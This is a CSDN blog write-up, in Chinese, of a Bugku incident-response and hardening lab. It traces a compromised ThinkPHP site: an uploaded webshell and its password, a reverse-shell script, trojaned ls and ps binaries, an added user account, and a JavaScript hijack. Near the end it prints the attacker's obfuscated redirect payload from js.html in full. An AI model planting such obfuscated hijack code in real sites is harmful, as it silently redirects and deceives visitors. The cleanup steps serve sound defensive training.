bugku-应急加固

最新推荐文章于 2024-05-29 10:31:44 发布
最新推荐文章于 2024-05-29 10:31:44 发布
阅读量1.1k 收藏 7
点赞数 2
分类专栏: 靶场 文章标签: ssh 运维 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71518346/article/details/128382889
版权

目录

1、获取js劫持域名 

2、黑客首次webshell密码

3、黑客首次攻击(非有效攻击)通过什么方式(如:文件上传、SQL注入、命令执行)

4、请找到黑客留下的后门中黑客服务器的ip及端口

5、黑客篡改的ls生成的免杀webshell,找到提交webshell内的flag

6、MySQL

7、找到黑客添加的账号并删除

8、篡改命令1,2

9、修复js劫持

1、获取js劫持域名 

直接访问发现刚开始是一个xx二手交易市场,随即跳转到了https://www.194nb.com。这个URL就是flag

2、黑客首次webshell密码

 登录ssh服务器:ssh root@47.101.144.74,查看站点上传文件目录 /var/www/html/public/Uploads 查看上传文件,在上传的webshell中发现密码 只有一个.php文件,查看一下提交就行了

或者分析/var/log/nginx/access.log下的日志在/var/www/html/public/Uploads/6127418cad73c.php中,进入服务器cat查看

密码为:QjsvWsp6L84Vl9dRTTytVyn5xNr1

3、黑客首次攻击(非有效攻击)通过什么方式(如:文件上传、SQL注入、命令执行)

 查看/var/log/nginx/ 下的nginx web访问日志看到关键字 'alert',判定为xss

或者下载nginx日志

4、请找到黑客留下的后门中黑客服务器的ip及端口

查看系统日志syslog:sudo cat /var/log/syslog |tail -n 100

 执行ps -aux看看当前进程,筛选出www-data用户的进程  

发现有一个恶意的1.sh,读出来发现是一个反弹shell的脚本

5、黑客篡改的ls生成的免杀webshell,找到提交webshell内的flag

正常ls返回是自动排版的, 检查ls文件发现ls被劫持,删除/bin/ls把/bin/ls2改回ls即可

同时发现黑客留下的第二个webshell后门

也可以用日志提取慢慢分析,最后在/var/www/html/public/static/img里面找到一个1.php,查看一下发现正是要找的东西

6、MySQL

数据库账号密码在/var/www/html/application/database.php中

登录mysql, 回收用户的file权限并关闭全局日志功能,点击题目中的check按钮即可完成该题目。

mysql -u root -p123456
mysql> revoke file on *.* from 'root'@'localhost';
Query OK, 0 rows affected (0.00 sec)
mysql> set global general_log = off;
Query OK, 0 rows affected (0.00 sec)
mysql> flush privileges;
Query OK, 0 rows affected (0.00 sec)

7、找到黑客添加的账号并删除

 cat /etc/passwd查找黑客留下的账号

ps -u aman   确认aman用户下没有别的进程

userdel -r aman  删除账号

8、篡改命令1,2

先去/bin里面找一下常用的命令,发现ls 跟 ps 命令有问题

删除ls和ps,并且把正版的ls2和ps_恢复,并且把冒牌货ls中用echo写入的“不死马”删除

rm -rf ls

rm -rf ps

mv ls2 ls

mv ps_ ps

rm -rf /var/www/html/public/static/img/1.php

9、修复js劫持

root@iZuf6dghbdoy5hxqqq3e4qZ:/var/www/html# find . | xargs grep -ri '<script type="text/javascript">' -l | sort | uniq -c
      6 ./application/home/view/public/js.html
      4 ./runtime/temp/7989650828d8c92a2cbbbcbe7c322c03.php
      4 ./runtime/temp/ba0546f2ed29bcb24fbace34b295ef45.php
      4 ./thinkphp/tpl/dispatch_jump.tpl
      4 ./thinkphp/tpl/page_trace.tpl
root@iZuf6dghbdoy5hxqqq3e4qZ:/var/www/html# rm runtime/temp/7989650828d8c92a2cbbbcbe7c322c03.php
root@iZuf6dghbdoy5hxqqq3e4qZ:/var/www/html# rm runtime/temp/ba0546f2ed29bcb24fbace34b295ef45.php

把马都删了,然后看一下这个js.html
root@iZuf6dghbdoy5hxqqq3e4qZ:/var/www/html# cat application/home/view/public/js.html

<script src="__STATIC__js/jquery.min.js"></script>
<script src="__STATIC__js/amazeui.min.js"></script>
<script src="__STATIC__js/iscroll.js"></script>
<script src="__STATIC__js/amazeui.page.js"></script>
<script src="__STATIC__js/app.js"></script>
<script src="__STATIC__js/aman.js"></script>
<script src="__STATIC__/lib/layer.js"></script>
<script type="text/javascript">
    ['sojson.v4']["\x66\x69\x6c\x74\x65\x72"]["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"](((['sojson.v4'] + [])["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"]['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']['\x61\x70\x70\x6c\x79'](null, "118G97R114N32J74g116J114Y118p103G49c32T61Y32d47A46N40K115V111q103P111B117l124o115s111l124B104h97D111n115m111n117O124d98k97I105I100N117x124f103Q111F111c103Z108V101c124d121G111z117u100F97g111O124Z121H97f104S111y111o124E98Q105z110c103T124g103u111M117B103K111o117P124G49k49s56V49J49n52v124n118l110D101M116P124Z51Z54q48u124T105U111n97v103E101B124M115M109k124c115g112u41V40c46b91L97K45V122y48i45I57A47Y45W93K43U41d123n49Z44v50m125f47a105K103A59v10A32z32q32W32P118d97E114f32v109B95n103j103M50Q32t61p32U119Q105h110E100t111Y119i91G34w100O111Z99P117L109L101D110Q116t34q93i91y34R114L101Z102T101G114h114l101K114l34c93e59S10l32M32t32o32Z105V102t32K40f74k116N114O118N103X49g91e34D116V101g115a116w34w93Z40x109g95a103V103X50I41a41p32U123X10w32W32p32q32j32U32K32o32l119G105M110B100c111g119Q91G34U108n111m99J97t116J105R111i110w34X93a91A34w104H114V101v102R34Y93z32e61X32t34a104O116T116K112S115V58O47Z47a119o119w119J46E49i57T52E110e98V46S99A111e109M34W10D32x32N32Y32h32r32b32V32t104h61C123M102w108T97l103Q58b34K123b110u119T109o98W56S114O107F116y53T110e117r110k51o112P105Y102U53q119y115t46w121o97A52d110H107K115c48y50N122w107G125u34a125a59j10A32j32G32h32t125F32p101d108a115h101r32u123k10e32E32A32y32b32j32a32x32M108Y111f99g97r116F105J111J110W91e39n104I114S101N102D39Y93f32F61d32D34L104T116c116v112e115f58t47B47F119P119l119u46t49Z57X52R110r98X46s99B111W109L34a10f32q32g32f32T125" ['\x73\x70\x6c\x69\x74'](/[a-zA-Z]{1,}/))))('sojson.v4');
</script>root@iZuf6dghbdoy5hxqqq3e4qZ:/var/www/html# vim application/home/view/public/js.html

把里面的恶意代码删了,然后也check成功了 

有原则的兔子
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XPON网络优化-安全加固
03-15
XPON 网络优化 - 安全加固 XPON 网络优化 - 安全加固是指在 XPON 网络中实现安全加固的过程,旨在提高网络的安全性和可靠性。该过程涵盖了多个方面,包括设备安全性、数据平面安全性、控制平面安全性、管理平面安全...
android-app加固
12-17
"Android App加固"是提升应用程序安全性的一种重要手段,它主要是为了防止恶意攻击者对APP进行逆向工程,获取源代码,篡改程序行为,或者植入恶意代码。本篇文章将深入探讨app加固原理以及反编译的相关知识。 首先...
BugKu -- PRA -- 应急加固1
jiuyongpinyin的博客
01-11 1563
Bugku -- PRA -- 应急加固1
BugKu -- PRA -- 应急加固【简单】
jiuyongpinyin的博客
01-25 1690
BugKu -- PRA -- 应急加固【简单】
bugku windows 2008应急加固
最新发布
qq274575499的博客
05-29 1125
windows2008应急加固
Bugku应急加固1——JS劫持
未完成的歌~的博客
04-20 1459
来打一下bugku应急加固靶场,靶场链接:https://ctf.bugku.com/ctfplus/detail/id/2.html启动环境。
应急--加固
qq_37313531的博客
03-23 703
应急: 1、找原因,为什么会产生勒索病毒? 1)、勒索病毒的特征:文件加密、BTC(比特币)地址--家族,定位到解密方式, 2)、如何解密,搜不出来怎么办? 3)、明确如何进来的 3389、漏洞 永恒之蓝ms17010-2017年勒索病毒利用最多; 邮件; log4j-2022年勒索病毒利用最多的漏洞; 云桌面; 4)、定位 3389--外网入口(弱口令爆破) windows排查: 账号 端口、进程 启动项系统信息、计划任务、服务 系统信息 自动化查杀 日志 查看痕迹,是
bugku 安全加固1
m0_62709637的博客
03-01 559
bugku安全加固1
bugku应急响应1的个人解题思路
sunquan705的博客
11-10 1207
bugku里的应急响应1的一些个人看法,有错的地方还请各位师傅指出
行业分类-设备装置-墙体加固结构.zip
09-01
《墙体加固结构》 在建筑工程领域,墙体加固结构是一个至关重要的环节,它涉及到建筑的安全性、稳定性和耐久性。本资料集主要针对行业分类中的设备装置,详细探讨了墙体加固的各种方法和技术,旨在提高建筑物的整体...
HP-UNIX加固手册
02-14
HP-UNIX加固手册详细解析与实施指南 HP-UNIX,作为惠普公司开发的一款高性能、高稳定性的UNIX操作系统,广泛应用于企业级服务器环境。然而,任何操作系统都可能面临安全威胁,因此,对HP-UNIX系统进行加固至关重要...
windows系统-安全加固部分
12-26
windows系统-安全加固部分,经过多个企业项目经验得出。
应急加固初试(windows sever 2008)
m0_55400802的博客
05-05 723
红中(hong_zh0)CSDN内容合伙人、2023年新星计划web安全方向导师、华为MindSpore截至目前最年轻的优秀开发者、IK&N战队队长、吉林师范大学网安大一的一名普通学生、搞网安论文拿了回大挑校二、阿里云专家博主、华为网络安全云享专家、腾讯云自媒体分享计划博主过几天要去打网安职业技能得比赛,题挺难找的。做了下bugku应急加固一共七问。
JAVA Web应用常见漏洞与修复建议
qq_39560975的博客
07-27 6272
跨站脚本、输入验证、代码注入等常见漏洞解析和修改方案
bugku-awd 初体验
CHAWUCIREN1的博客
05-26 6917
昨天第一次尝试打bugku的awd,菜的一批,加固时间全用来登录了,忙活半天 看到下面页面以后 putty连接 注意事项: 这个ip和普通ip有差别:192-168-1-124.pvp233.bugku.cn 注意端口是2222 连上以后,用户名输team+你的编号,比如我的用户名是team1 密码的话如果不想手输,可以shift+insert粘贴(注意:在Linux中不能用ctrl+v进行粘贴) putty如果长时间不进行操作可能会掉线,如果遇见没反应的话,不要慌,关了重新登录就行
Bugku 多种方法解决
weixin_63289925的博客
02-27 808
下载压缩包解压,发现是一个名为KEY的应用程序 尝试着打开,发现无法运行 用winhex的打开方式打开KEY,打开之后如下图 把最右边的字符串全复制下来,去网上用Base64转图片解密工具进行解密,得到一个二维码 用手机进行扫码即可得到flag ...
bugku渗透测试 1 writeup(无需VPS)
没事我溜达
11-22 3859
BugKu该靶场只需要20金币就可以开启两小时,算的上非常良心实惠了,趁着有空赶紧刷一刷题目。
js总结(10)js获取当前域名、Url、相对路径和参数以及指定参数
dianfengzao1245的博客
01-18 437
一、js获取当前域名有2种方法 获取到当前域名的顶级域名 "http://m."+document.domain.split('.').slice(-2).join('.');   1、方法一   var domain = document.domain;   2、方法二   var domain = window.location.host; ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值